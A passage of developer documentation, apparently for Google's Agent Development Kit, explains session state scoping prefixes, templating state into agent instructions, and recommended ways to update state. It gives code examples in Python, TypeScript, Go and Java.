numbers, booleans, and simple lists or dictionaries containing *only* these basic types. (See API documentation for precise details). - **⚠️ Avoid Complex Objects:** **Do not store non-serializable objects** (custom class instances, functions, connections, etc.) directly in the state. Store simple identifiers if needed, and retrieve the complex object elsewhere. 1. **Mutability: It Changes** - The contents of the `state` are expected to change as the conversation evolves. 1. **Persistence: Depends on `SessionService`** - Whether state survives application restarts depends on your chosen service: - `InMemorySessionService`: **Not Persistent.** State is lost on restart. - `DatabaseSessionService` / `VertexAiSessionService`: **Persistent.** State is saved reliably. Note The specific parameters or method names for the primitives may vary slightly by SDK language (e.g., `session.state['current_intent'] = 'book_flight'` in Python,`context.State().Set("current_intent", "book_flight")` in Go, `session.state().put("current_intent", "book_flight)` in Java, or `context.state.set("current_intent", "book_flight")` in TypeScript). Refer to the language-specific API documentation for details. ### Organizing State with Prefixes: Scope Matters Prefixes on state keys define their scope and persistence behavior, especially with persistent services: - **No Prefix (Session State):** - **Scope:** Specific to the *current* session (`id`). - **Persistence:** Only persists if the `SessionService` is persistent (`Database`, `VertexAI`). - **Use Cases:** Tracking progress within the current task (e.g., `'current_booking_step'`), temporary flags for this interaction (e.g., `'needs_clarification'`). - **Example:** `session.state['current_intent'] = 'book_flight'` - **`user:` Prefix (User State):** - **Scope:** Tied to the `user_id`, shared across *all* sessions for that user (within the same `app_name`). - **Persistence:** Persistent with `Database` or `VertexAI`. (Stored by `InMemory` but lost on restart). - **Use Cases:** User preferences (e.g., `'user:theme'`), profile details (e.g., `'user:name'`). - **Example:** `session.state['user:preferred_language'] = 'fr'` - **`app:` Prefix (App State):** - **Scope:** Tied to the `app_name`, shared across *all* users and sessions for that application. - **Persistence:** Persistent with `Database` or `VertexAI`. (Stored by `InMemory` but lost on restart). - **Use Cases:** Global settings (e.g., `'app:api_endpoint'`), shared templates. - **Example:** `session.state['app:global_discount_code'] = 'SAVE10'` - **`temp:` Prefix (Temporary Invocation State):** - **Scope:** Specific to the current **invocation** (the entire process from an agent receiving user input to generating the final output for that input). - **Persistence:** **Not Persistent.** Discarded after the invocation completes and does not carry over to the next one. - **Use Cases:** Storing intermediate calculations, flags, or data passed between tool calls within a single invocation. - **When Not to Use:** For information that must persist across different invocations, such as user preferences, conversation history summaries, or accumulated data. - **Example:** `session.state['temp:raw_api_response'] = {...}` Sub-Agents and Invocation Context When a parent agent calls a sub-agent (e.g., using `SequentialAgent` or `ParallelAgent`), it passes its `InvocationContext` to the sub-agent. This means the entire chain of agent calls shares the same invocation ID and, therefore, the same `temp:` state. **How the Agent Sees It:** Your agent code interacts with the *combined* state through the single `session.state` collection (dict/ Map). The `SessionService` handles fetching/merging state from the correct underlying storage based on prefixes. ### Accessing Session State in Agent Instructions When working with `LlmAgent` instances, you can directly inject session state values into the agent's instruction string using a simple templating syntax. This allows you to create dynamic and context-aware instructions without relying solely on natural language directives. #### Using `{key}` Templating To inject a value from the session state, enclose the key of the desired state variable within curly braces: `{key}`. The framework will automatically replace this placeholder with the corresponding value from `session.state` before passing the instruction to the LLM. **Example:** ```python from google.adk.agents import LlmAgent story_generator = LlmAgent( name="StoryGenerator", model="gemini-2.0-flash", instruction="""Write a short story about a cat, focusing on the theme: {topic}.""" ) # Assuming session.state['topic'] is set to "friendship", the LLM # will receive the following instruction: # "Write a short story about a cat, focusing on the theme: friendship." ``` ```typescript import { LlmAgent } from "@google/adk"; const storyGenerator = new LlmAgent({ name: "StoryGenerator", model: "gemini-2.5-flash", instruction: "Write a short story about a cat, focusing on the theme: {topic}." }); // Assuming session.state['topic'] is set to "friendship", the LLM // will receive the following instruction: // "Write a short story about a cat, focusing on the theme: friendship." ``` ```go func main() { ctx := context.Background() sessionService := session.InMemoryService() // 1. Initialize a session with a 'topic' in its state. _, err := sessionService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, SessionID: sessionID, State: map[string]any{ "topic": "friendship", }, }) if err != nil { log.Fatalf("Failed to create session: %v", err) } // 2. Create an agent with an instruction that uses a {topic} placeholder. // The ADK will automatically inject the value of "topic" from the // session state into the instruction before calling the LLM. model, err := gemini.NewModel(ctx, modelID, nil) if err != nil { log.Fatalf("Failed to create Gemini model: %v", err) } storyGenerator, err := llmagent.New(llmagent.Config{ Name: "StoryGenerator", Model: model, Instruction: "Write a short story about a cat, focusing on the theme: {topic}.", }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } r, err := runner.New(runner.Config{ AppName: appName, Agent: agent.Agent(storyGenerator), SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } ``` #### Important Considerations - Key Existence: Ensure that the key you reference in the instruction string exists in the session.state. If the key is missing, the agent will throw an error. To use a key that may or may not be present, you can include a question mark (?) after the key (e.g. {topic?}). - Data Types: The value associated with the key should be a string or a type that can be easily converted to a string. - Escaping: If you need to use literal curly braces in your instruction (e.g., for JSON formatting), you'll need to escape them. #### Bypassing State Injection with `InstructionProvider` In some cases, you might want to use `{{` and `}}` literally in your instructions without triggering the state injection mechanism. For example, you might be writing instructions for an agent that helps with a templating language that uses the same syntax. To achieve this, you can provide a function to the `instruction` parameter instead of a string. This function is called an `InstructionProvider`. When you use an `InstructionProvider`, the ADK will not attempt to inject state, and your instruction string will be passed to the model as-is. The `InstructionProvider` function receives a `ReadonlyContext` object, which you can use to access session state or other contextual information if you need to build the instruction dynamically. ```python from google.adk.agents import LlmAgent from google.adk.agents.readonly_context import ReadonlyContext # This is an InstructionProvider def my_instruction_provider(context: ReadonlyContext) -> str: # You can optionally use the context to build the instruction # For this example, we'll return a static string with literal braces. return "This is an instruction with {{literal_braces}} that will not be replaced." agent = LlmAgent( model="gemini-2.0-flash", name="template_helper_agent", instruction=my_instruction_provider ) ``` ```typescript import { LlmAgent, ReadonlyContext } from "@google/adk"; // This is an InstructionProvider function myInstructionProvider(context: ReadonlyContext): string { // You can optionally use the context to build the instruction // For this example, we'll return a static string with literal braces. return "This is an instruction with {{literal_braces}} that will not be replaced."; } const agent = new LlmAgent({ model: "gemini-2.5-flash", name: "template_helper_agent", instruction: myInstructionProvider }); ``` ```go // 1. This InstructionProvider returns a static string. // Because it's a provider function, the ADK will not attempt to inject // state, and the instruction will be passed to the model as-is, // preserving the literal braces. func staticInstructionProvider(ctx agent.ReadonlyContext) (string, error) { return "This is an instruction with {{literal_braces}} that will not be replaced.", nil } ``` If you want to both use an `InstructionProvider` *and* inject state into your instructions, you can use the `inject_session_state` utility function. ```python from google.adk.agents import LlmAgent from google.adk.agents.readonly_context import ReadonlyContext from google.adk.utils import instructions_utils async def my_dynamic_instruction_provider(context: ReadonlyContext) -> str: template = "This is a {adjective} instruction with {{literal_braces}}." # This will inject the 'adjective' state variable but leave the literal braces. return await instructions_utils.inject_session_state(template, context) agent = LlmAgent( model="gemini-2.0-flash", name="dynamic_template_helper_agent", instruction=my_dynamic_instruction_provider ) ``` ```go // 2. This InstructionProvider demonstrates how to manually inject state // while also preserving literal braces. It uses the instructionutil helper. func dynamicInstructionProvider(ctx agent.ReadonlyContext) (string, error) { template := "This is a {adjective} instruction with {{literal_braces}}." // This will inject the 'adjective' state variable but leave the literal braces. return instructionutil.InjectSessionState(ctx, template) } ``` **Benefits of Direct Injection** - Clarity: Makes it explicit which parts of the instruction are dynamic and based on session state. - Reliability: Avoids relying on the LLM to correctly interpret natural language instructions to access state. - Maintainability: Simplifies instruction strings and reduces the risk of errors when updating state variable names. **Relation to Other State Access Methods** This direct injection method is specific to LlmAgent instructions. Refer to the following section for more information on other state access methods. ### How State is Updated: Recommended Methods The Right Way to Modify State When you need to change the session state, the correct and safest method is to **directly modify the `state` object on the `Context`** provided to your function (e.g., `callback_context.state['my_key'] = 'new_value'`). This is considered "direct state manipulation" in the right way, as the framework automatically tracks these changes. This is critically different from directly modifying the `state` on a `Session` object you retrieve from the `SessionService` (e.g., `my_session.state['my_key'] = 'new_value'`). **You should avoid this**, as it bypasses the ADK's event tracking and can lead to lost data. The "Warning" section at the end of this page has more details on this important distinction. State should **always** be updated as part of adding an `Event` to the session history using `session_service.append_event()`. This ensures changes are tracked, persistence works correctly, and updates are thread-safe. **1. The Easy Way: `output_key` (for Agent Text Responses)** This is the simplest method for saving an agent's final text response directly into the state. When defining your `LlmAgent`, specify the `output_key`: ```py from google.adk.agents import LlmAgent from google.adk.sessions import InMemorySessionService, Session from google.adk.runners import Runner from google.genai.types import Content, Part # Define agent with output_key greeting_agent = LlmAgent( name="Greeter", model="gemini-2.0-flash", # Use a valid model instruction="Generate a short, friendly greeting.", output_key="last_greeting" # Save response to state['last_greeting'] ) # --- Setup Runner and Session --- app_name, user_id, session_id = "state_app", "user1", "session1" session_service = InMemorySessionService() runner = Runner( agent=greeting_agent, app_name=app_name, session_service=session_service ) session = await session_service.create_session(app_name=app_name, user_id=user_id, session_id=session_id) print(f"Initial state: {session.state}") # --- Run the Agent --- # Runner handles calling append_event, which uses the output_key # to automatically create the state_delta. user_message = Content(parts=[Part(text="Hello")]) for event in runner.run(user_id=user_id, session_id=session_id, new_message=user_message): if event.is_final_response(): print(f"Agent responded.") # Response text is also in event.content # --- Check Updated State --- updated_session = await session_service.get_session(app_name=APP_NAME, user_id=USER_ID, session_id=session_id) print(f"State after agent run: {updated_session.state}") # Expected output might include: {'last_greeting': 'Hello there! How can I help you today?'} ``` ```typescript import { LlmAgent, Runner, InMemorySessionService, isFinalResponse } from "@google/adk"; import { Content } from "@google/genai"; // Define agent with outputKey const greetingAgent = new LlmAgent({ name: "Greeter", model: "gemini-2.5-flash", instruction: "Generate a short, friendly greeting.", outputKey: "last_greeting" // Save response to state['last_greeting'] }); // --- Setup Runner and Session --- const appName = "state_app"; const userId = "user1"; const sessionId = "session1"; const sessionService = new InMemorySessionService(); const runner = new Runner({ agent: greetingAgent, appName: appName, sessionService: sessionService }); const session = await sessionService.createSession({ appName, userId, sessionId }); console.log(`Initial state: ${JSON.stringify(session.state)}`); // --- Run the Agent --- // Runner handles calling appendEvent, which uses the outputKey // to automatically create the stateDelta. const userMessage: Content = { parts: [{ text: "Hello" }] }; for await (const event of runner.runAsync({ userId, sessionId, newMessage: userMessage })) { if (isFinalResponse(event)) { console.log("Agent responded."); // Response text is also in event.content } } // --- Check Updated State --- const updatedSession = await sessionService.getSession({ appName, userId, sessionId }); console.log(`State after agent run: ${JSON.stringify(updatedSession?.state)}`); // Expected output might include: {"last_greeting":"Hello there! How can I help you today?"} ``` ```go // 1. GreetingAgent demonstrates using `OutputKey` to save an agent's // final text response directly into the session state. func greetingAgentExample(sessionService session.Service) { fmt.Println("--- Running GreetingAgent (output_key) Example ---") ctx := context.Background() modelGreeting, err := gemini.NewModel(ctx, modelID, nil) if err != nil { log.Fatalf("Failed to create Gemini model for greeting agent: %v", err) } greetingAgent, err := llmagent.New(llmagent.Config{ Name: "Greeter", Model: modelGreeting, Instruction: "Generate a short, friendly greeting.", OutputKey: "last_greeting", }) if err != nil { log.Fatalf("Failed to create greeting agent: %v", err) } r, err := runner.New(runner.Config{ AppName: appName, Agent: agent.Agent(greetingAgent), SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } // Run the agent userMessage := genai.NewContentFromText("Hello", "user") for event, err := range r.Run(ctx, userID, sessionID, userMessage, agent.RunConfig{}) { if err != nil { log.Printf("Agent Error: %v", err) continue } if isFinalResponse(event) { if event.LLMResponse.Content != nil { fmt.Printf("Agent responded with: %q\n", textParts(event.LLMResponse.Content)) } else { fmt.Println("Agent responded.") } } } // Check the updated state resp, err := sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: sessionID}) if err != nil { log.Fatalf("Failed to get session: %v", err) } lastGreeting, _ := resp.Session.State().Get("last_greeting") fmt.Printf("State after agent run: last_greeting = %q\n\n", lastGreeting) } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.RunConfig; import com.google.adk.events.Event; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import com.google.genai.types.Content; import com.google.genai.types.Part; import java.util.List; import java.util.Optional; public class GreetingAgentExample { public static void main(String[] args) { // Define agent with output_key LlmAgent greetingAgent = LlmAgent.builder() .name("Greeter") .model("gemini-2.0-flash") .instruction("Generate a short, friendly greeting.") .description("Greeting agent") .outputKey("last_greeting") // Save response to state['last_greeting'] .build(); // --- Setup Runner and Session --- String appName = "state_app"; String userId = "user1"; String sessionId = "session1"; InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(greetingAgent, appName, null, sessionService); // artifactService can be null if not used Session session = sessionService.createSession(appName, userId, null, sessionId).blockingGet(); System.out.println("Initial state: " + session.state().entrySet()); // --- Run the Agent --- // Runner handles calling appendEvent, which uses the output_key // to automatically create the stateDelta. Content userMessage = Content.builder().parts(List.of(Part.fromText("Hello"))).build(); // RunConfig is needed for runner.runAsync in Java RunConfig runConfig = RunConfig.builder().build(); for (Event event : runner.runAsync(userId, sessionId, userMessage, runConfig).blockingIterable()) { if (event.finalResponse()) { System.out.println("Agent responded."); // Response text is also in event.content } } // --- Check Updated State --- Session updatedSession = sessionService.getSession(appName, userId, sessionId, Optional.empty()).blockingGet(); assert updatedSession != null; System.out.println("State after agent run: " + updatedSession.state().entrySet()); // Expected output might include: {'last_greeting': 'Hello there! How can I help you today?'} } } ``` Behind the scenes, the `Runner` uses the `output_key` to create the necessary `EventActions` with a `state_delta` and calls `append_event`. **2. The Standard Way: `EventActions.state_delta` (for Complex Updates)** For more complex scenarios (updating multiple keys, non-string values, specific scopes like `user:` or `app:`, or updates not tied directly to the agent's final text), you manually construct the `state_delta` within `EventActions`. ```py from google.adk.sessions import InMemorySessionService, Session from google.adk.events import Event, EventActions from google.genai.types import Part, Content import time # --- Setup --- session_service = InMemorySessionService() app_name, user_id, session_id = "state_app_manual", "user2", "session2" session = await session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id, state={"user:login_count": 0, "task_status": "idle"} ) print(f"Initial state: {session.state}") # --- Define State Changes --- current_time = time.time() state_changes = { "task_status": "active", # Update session state "user:login_count": session.state.get("user:login_count", 0) + 1, # Update user state "user:last_login_ts": current_time, # Add user state "temp:validation_needed": True # Add temporary state (will be discarded) } # --- Create Event with Actions --- actions_with_update = EventActions(state_delta=state_changes) # This event might represent an internal system action, not just an agent response system_event = Event( invocation_id="inv_login_update", author="system", # Or 'agent', 'tool' etc. actions=actions_with_update, timestamp=current_time # content might be None or represent the action taken ) # --- Append the Event (This updates the state) --- await session_service.append_event(session, system_event) print("`append_event` called with explicit state delta.") # --- Check Updated State --- updated_session = await session_service.get_session(app_name=app_name, user_id=user_id, session_id=session_id) print(f"State after event: {updated_session.state}") # Expected: {'user:login_count': 1, 'task_status': 'active', 'user:last_login_ts': } # Note: 'temp:validation_needed' is NOT present. ``` ```typescript import { InMemorySessionService, createEvent, createEventActions } from "@google/adk"; // --- Setup --- const sessionService = new InMemorySessionService(); const appName = "state_app_manual"; const userId = "user2"; const sessionId = "session2"; const session = await sessionService.createSession({ appName, userId, sessionId, state: { "user:login_count": 0, "task_status": "idle" } }); console.log(`Initial state: ${JSON.stringify(session.state)}`); // --- Define State Changes --- const currentTime = Date.now(); const stateChanges = { "task_status": "active", // Update session state "user:login_count": (session.state["user:login_count"] as number || 0) + 1, // Update user state "user:last_login_ts": currentTime, // Add user state "temp:validation_needed": true // Add temporary state (will be discarded) }; // --- Create Event with Actions --- const actionsWithUpdate = createEventActions({ stateDelta: stateChanges, }); // This event might represent an internal system action, not just an agent response const systemEvent = createEvent({ invocationId: "inv_login_update", author: "system", // Or 'agent', 'tool' etc. actions: actionsWithUpdate, timestamp: currentTime // content might be null or represent the action taken }); // --- Append the Event (This updates the state) --- await sessionService.appendEvent({ session, event: systemEvent }); console.log("`appendEvent` called with explicit state delta."); // --- Check Updated State --- const updatedSession = await sessionService.getSession({ appName, userId, sessionId }); console.log(`State after event: ${JSON.stringify(updatedSession?.state)}`); // Expected: {"user:login_count":1,"task_status":"active","user:last_login_ts":} // Note: 'temp:validation_needed' is NOT present. ``` ```go // 2. manualStateUpdateExample demonstrates creating an event with explicit // state changes (a "state_delta") to update multiple keys, including // those with user- and temp- prefixes. func manualStateUpdateExample(sessionService session.Service) { fmt.Println("--- Running Manual State Update (EventActions) Example ---") ctx := context.Background() s, err := sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: sessionID}) if err != nil { log.Fatalf("Failed to get session: %v", err) } retrievedSession := s.Session // Define state changes loginCount, _ := retrievedSession.State().Get("user:login_count") newLoginCount := 1 if lc, ok := loginCount.(int); ok { newLoginCount = lc + 1 } stateChanges := map[string]any{ "task_status": "active", "user:login_count": newLoginCount, "user:last_login_ts": time.Now().Unix(), "temp:validation_needed": true, } // Create an event with the state changes systemEvent := session.NewEvent("inv_login_update") systemEvent.Author = "system" systemEvent.Actions.StateDelta = stateChanges // Append the event to update the state if err := sessionService.AppendEvent(ctx, retrievedSession, systemEvent); err != nil { log.Fatalf("Failed to append event: %v", err) } fmt.Println("`append_event` called with explicit state delta.") // Check the updated state updatedResp, err := sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: sessionID}) if err != nil { log.Fatalf("Failed to get session: %v", err) } taskStatus, _ := updatedResp.Session.State().Get("task_status") loginCount, _ = updatedResp.Session.State().Get("user:login_count") lastLogin, _ := updatedResp.Session.State().Get("user:last_login_ts") temp, err := updatedResp.Session.State().Get("temp:validation_needed") // This should fail or be nil fmt.Printf("State after event: task_status=%q, user:login_count=%v, user:last_login_ts=%v\n", taskStatus, loginCount, lastLogin) if err != nil { fmt.Printf("As expected, temp state was not persisted: %v\n\n", err) } else { fmt.Printf("Unexpected temp state value: %v\n\n", temp) } } ``` ```java import com.google.adk.events.Event; import com.google.adk.events.EventActions; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import java.time.Instant; import java.util.Optional; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ConcurrentMap; public class ManualStateUpdateExample { public static void main(String[] args) { // --- Setup --- InMemorySessionService sessionService = new InMemorySessionService(); String appName = "state_app_manual"; String userId = "user2"; String sessionId = "session2"; ConcurrentMap initialState = new ConcurrentHashMap<>(); initialState.put("user:login_count", 0); initialState.put("task_status", "idle"); Session session = sessionService.createSession(appName, userId, initialState, sessionId).blockingGet(); System.out.println("Initial state: " + session.state().entrySet()); // --- Define State Changes --- long currentTimeMillis = Instant.now().toEpochMilli(); // Use milliseconds for Java Event ConcurrentMap stateChanges = new ConcurrentHashMap<>(); stateChanges.put("task_status", "active"); // Update session state // Retrieve and increment login_count Object loginCountObj = session.state().get("user:login_count"); int currentLoginCount = 0; if (loginCountObj instanceof Number) { currentLoginCount = ((Number) loginCountObj).intValue(); } stateChanges.put("user:login_count", currentLoginCount + 1); // Update user state stateChanges.put("user:last_login_ts", currentTimeMillis); // Add user state (as long milliseconds) stateChanges.put("temp:validation_needed", true); // Add temporary state // --- Create Event with Actions --- EventActions actionsWithUpdate = EventActions.builder().stateDelta(stateChanges).build(); // This event might represent an internal system action, not just an agent response Event systemEvent = Event.builder() .invocationId("inv_login_update") .author("system") // Or 'agent', 'tool' etc. .actions(actionsWithUpdate) .timestamp(currentTimeMillis) // content might be None or represent the action taken .build(); // --- Append the Event (This updates the state) --- sessionService.appendEvent(session, systemEvent).blockingGet(); System.out.println("`appendEvent` called with explicit state delta."); // --- Check Updated State --- Session updatedSession = sessionService.getSession(appName, userId, sessionId, Optional.empty()).blockingGet(); assert updatedSession != null; System.out.println("State after event: " + updatedSession.state().entrySet()); // Expected: {'user:login_count': 1, 'task_status': 'active', 'user:last_login_ts': } // Note: 'temp:validation_needed' is NOT present because InMemorySessionService's appendEvent // applies delta to its internal user/app state maps IF keys have prefixes, // and to the session's own state map (which is then merged on getSession). } } ``` **3. Via `CallbackContext` or `ToolContext` (Recommended for Callbacks and Tools)** Modifying state within agent callbacks (e.g., `on_before_agent_call`, `on_after_agent_call`) or tool functions is best done using the `state` attribute of the `CallbackContext` or `ToolContext` provided to your function. - `callback_context.state['my_key'] = my_value` - `tool_context.state['my_key'] = my_value` These context objects are specifically designed to manage state changes within their respective execution scopes. When you modify `context.state`, the ADK framework ensures that these changes are automatically captured and correctly routed into the `EventActions.state_delta` for the event being generated by the callback or tool. This delta is then processed by the `SessionService` when the event is appended, ensuring proper persistence and tracking. This method abstracts away the manual creation of `EventActions` and `state_delta` for most common state update scenarios within callbacks and tools, making your code cleaner and less error-prone. For more comprehensive details on context objects, refer to the [Context documentation](https://google.github.io/adk-docs/context/index.md). ```python # In an agent callback or tool function from google.adk.agents import CallbackContext # or ToolContext def my_callback_or_tool_function(context: CallbackContext, # Or ToolContext # ... other parameters ... ): # Update existing state count = context.state.get("user_action_count", 0) context.state["user_action_count"] = count + 1 # Add new state context.state["temp:last_operation_status"] = "success" # State changes are automatically part of the event's state_delta # ... rest of callback/tool logic ... ``` ```typescript // In an agent callback or tool function import { CallbackContext } from "@google/adk"; // or ToolContext function myCallbackOrToolFunction( context: CallbackContext, // Or ToolContext // ... other parameters ... ) { // Update existing state const count = context.state.get("user_action_count", 0); context.state.set("user_action_count", count + 1); // Add new state context.state.set("temp:last_operation_status", "success"); // State changes are automatically part of the event's stateDelta // ... rest of callback/tool logic ... } ``` ```go // 3. contextStateUpdateExample demonstrates the recommended way to modify state // from within a tool function using the provided `tool.Context`. func contextStateUpdateExample(sessionService session.Service) { fmt.Println("--- Running Context State Update (ToolContext) Example ---") ctx := context.Background() // Define the tool that modifies state updateActionCountTool, err := functiontool.New( functiontool.Config{Name: "update_action_count", Description: "Updates the user action count in the state."}, func(tctx tool.Context, args struct{}) (struct{}, error) { actx, ok := tctx.(agent.CallbackContext) if !ok { log.Fatalf("tool.Context is not of type agent.CallbackContext") } s, err := actx.State().Get("user_action_count") if err != nil { log.Printf("could not get user_action_count: %v", err) } newCount := 1 if c, ok := s.(int); ok { newCount = c + 1 } if err := actx.State().Set("user_action_count", newCount); err != nil { log.Printf("could not set user_action_count: %v", err) } if err := actx.State().Set("temp:last_operation_status", "success from tool"); err != nil { log.Printf("could not set temp:last_operation_status: %v", err) } fmt.Println("Tool: Updated state via agent.CallbackContext.") return struct{}{}, nil }, ) if err != nil { log.Fatalf("Failed to create tool: %v", err) } // Define an agent that uses the tool modelTool, err := gemini.NewModel(ctx, modelID, nil) if err != nil { log.Fatalf("Failed to create Gemini model for tool agent: %v", err) } toolAgent, err := llmagent.New(llmagent.Config{ Name: "ToolAgent", Model: modelTool, Instruction: "Use the update_action_count tool.", Tools: []tool.Tool{updateActionCountTool}, }) if err != nil { log.Fatalf("Failed to create tool agent: %v", err) } r, err := runner.New(runner.Config{ AppName: appName, Agent: agent.Agent(toolAgent), SessionService: sessionService, }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } // Run the agent to trigger the tool userMessage := genai.NewContentFromText("Please update the action count.", "user") for _, err := range r.Run(ctx, userID, sessionID, userMessage, agent.RunConfig{}) { if err != nil { log.Printf("Agent Error: %v", err) } } // Check the updated state resp, err := sessionService.Get(ctx, &session.GetRequest{AppName: appName, UserID: userID, SessionID: sessionID}) if err != nil { log.Fatalf("Failed to get session: %v", err) } actionCount, _ := resp.Session.State().Get("user_action_count") fmt.Printf("State after tool run: user_action_count = %v\n", actionCount) } ``` ```java // In an agent callback or tool method import com.google.adk.agents.CallbackContext; // or ToolContext // ... other imports ... public class MyAgentCallbacks { public void onAfterAgent(CallbackContext callbackContext) { // Update existing state Integer count = (Integer) callbackContext.state().getOrDefault("user_action_count", 0); callbackContext.state().put("user_action_count", count + 1); // Add new state callbackContext.state().put("temp:last_operation_status", "success"); // State changes are automatically part of the event's state_delta // ... rest of callback logic ... } } ``` **What `append_event` Does:** - Adds the `Event` to `session.events`. - Reads the `state_delta` from the event's `actions`. - Applies these changes to the state managed by the `SessionService`, correctly handling prefixes and persistence based on the service type. - Updates the session's `last_update_time`. - Ensures thread-safety for concurrent updates. ### ⚠️ A Warning About Direct State Modification Avoid directly modifying the `session.state` collection (dictionary/Map) on a `Session` object that was obtained directly from the `SessionService` (e.g., via `session_service.get_session()` or `session_service.create_session()`) *outside* of the managed lifecycle of an agent invocation (i.e., not through a `CallbackContext` or `ToolContext`). For example, code like `retrieved_session = await session_service.get_session(...); retrieved_session.state['key'] = value` is problematic. State modifications *within* callbacks or tools using `CallbackContext.state` or `ToolContext.state` are the correct way to ensure changes are tracked, as these context objects handle the necessary integration with the event system. **Why direct modification (outside of contexts) is strongly discouraged:** 1. **Bypasses Event History:** The change isn't recorded as an `Event`, losing auditability. 1. **Breaks Persistence:** Changes made this way **will likely NOT be saved** by `DatabaseSessionService` or `VertexAiSessionService`. They rely on `append_event` to trigger saving. 1. **Not Thread-Safe:** Can lead to race conditions and lost updates. 1. **Ignores Timestamps/Logic:** Doesn't update `last_update_time` or trigger related event logic. **Recommendation:** Stick to updating state via `output_key`, `EventActions.state_delta` (when manually creating events), or by modifying the `state` property of `CallbackContext` or `ToolContext` objects when within their respective scopes. These methods ensure reliable, trackable, and persistent state management. Use direct access to `session.state` (from a `SessionService`-retrieved session) only for *reading* state. ### Best Practices for State Design Recap - **Minimalism:** Store only essential, dynamic data. - **Serialization:** Use basic, serializable types. - **Descriptive Keys & Prefixes:** Use clear names and appropriate prefixes (`user:`, `app:`, `temp:`, or none). - **Shallow Structures:** Avoid deep nesting where possible. - **Standard Update Flow:** Rely on `append_event`. # Session: Tracking Individual Conversations Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 Following our Introduction, let's dive into the `Session`. Think back to the idea of a "conversation thread." Just like you wouldn't start every text message from scratch, agents need context regarding the ongoing interaction. **`Session`** is the ADK object designed specifically to track and manage these individual conversation threads. ## The `Session` Object When a user starts interacting with your agent, the `SessionService` creates a `Session` object (`google.adk.sessions.Session`). This object acts as the container holding everything related to that *one specific chat thread*. Here are its key properties: - **Identification (`id`, `appName`, `userId`):** Unique labels for the conversation. - `id`: A unique identifier for *this specific* conversation thread, essential for retrieving it later. A SessionService object can handle multiple `Session`(s). This field identifies which particular session object are we referring to. For example, "test_id_modification". - `app_name`: Identifies which agent application this conversation belongs to. For example, "id_modifier_workflow". - `userId`: Links the conversation to a particular user. - **History (`events`):** A chronological sequence of all interactions (`Event` objects – user messages, agent responses, tool actions) that have occurred within this specific thread. - **Session State (`state`):** A place to store temporary data relevant *only* to this specific, ongoing conversation. This acts as a scratchpad for the agent during the interaction. We will cover how to use and manage `state` in detail in the next section. - **Activity Tracking (`lastUpdateTime`):** A timestamp indicating the last time an event occurred in this conversation thread. ### Example: Examining Session Properties ```py from google.adk.sessions import InMemorySessionService, Session # Create a simple session to examine its properties temp_service = InMemorySessionService() example_session = await temp_service.create_session( app_name="my_app", user_id="example_user", state={"initial_key": "initial_value"} # State can be initialized ) print(f"--- Examining Session Properties ---") print(f"ID (`id`): {example_session.id}") print(f"Application Name (`app_name`): {example_session.app_name}") print(f"User ID (`user_id`): {example_session.user_id}") print(f"State (`state`): {example_session.state}") # Note: Only shows initial state here print(f"Events (`events`): {example_session.events}") # Initially empty print(f"Last Update (`last_update_time`): {example_session.last_update_time:.2f}") print(f"---------------------------------") # Clean up (optional for this example) temp_service = await temp_service.delete_session(app_name=example_session.app_name, user_id=example_session.user_id, session_id=example_session.id) print("The final status of temp_service - ", temp_service) ``` ```typescript import { InMemorySessionService } from "@google/adk"; // Create a simple session to examine its properties const tempService = new InMemorySessionService(); const exampleSession = await tempService.createSession({ appName: "my_app", userId: "example_user", state: {"initial_key": "initial_value"} // State can be initialized }); console.log("--- Examining Session Properties ---"); console.log(`ID ('id'): ${exampleSession.id}`); console.log(`Application Name ('appName'): ${exampleSession.appName}`); console.log(`User ID ('userId'): ${exampleSession.userId}`); console.log(`State ('state'): ${JSON.stringify(exampleSession.state)}`); // Note: Only shows initial state here console.log(`Events ('events'): ${JSON.stringify(exampleSession.events)}`); // Initially empty console.log(`Last Update ('lastUpdateTime'): ${exampleSession.lastUpdateTime}`); console.log("---------------------------------"); // Clean up (optional for this example) const finalStatus = await tempService.deleteSession({ appName: exampleSession.appName, userId: exampleSession.userId, sessionId: exampleSession.id }); console.log("The final status of temp_service - ", finalStatus); ``` ```go appName := "my_go_app" userID := "example_go_user" initialState := map[string]any{"initial_key": "initial_value"} // Create a session to examine its properties. createResp, err := inMemoryService.Create(ctx, &session.CreateRequest{ AppName: appName, UserID: userID, State: initialState, }) if err != nil { log.Fatalf("Failed to create session: %v", err) } exampleSession := createResp.Session fmt.Println("\n--- Examining Session Properties ---") fmt.Printf("ID (`ID()`): %s\n", exampleSession.ID()) fmt.Printf("Application Name (`AppName()`): %s\n", exampleSession.AppName()) // To access state, you call Get(). val, _ := exampleSession.State().Get("initial_key") fmt.Printf("State (`State().Get()`): initial_key = %v\n", val) // Events are initially empty. fmt.Printf("Events (`Events().Len()`): %d\n", exampleSession.Events().Len()) fmt.Printf("Last Update (`LastUpdateTime()`): %s\n", exampleSession.LastUpdateTime().Format("2006-01-02 15:04:05")) fmt.Println("---------------------------------") // Clean up the session. err = inMemoryService.Delete(ctx, &session.DeleteRequest{ AppName: exampleSession.AppName(), UserID: exampleSession.UserID(), SessionID: exampleSession.ID(), }) if err != nil { log.Fatalf("Failed to delete session: %v", err) } fmt.Println("Session deleted successfully.") ``` ```java import com.google.adk.sessions.InMemorySessionService; import com.google.adk.sessions.Session; import java.util.concurrent.ConcurrentMap; import java.util.concurrent.ConcurrentHashMap; String sessionId = "123"; String appName = "example-app"; // Example app name String userId = "example-user"; // Example user id ConcurrentMap initialState = new ConcurrentHashMap<>(Map.of("newKey", "newValue")); InMemorySessionService exampleSessionService = new InMemorySessionService(); // Create Session Session exampleSession = 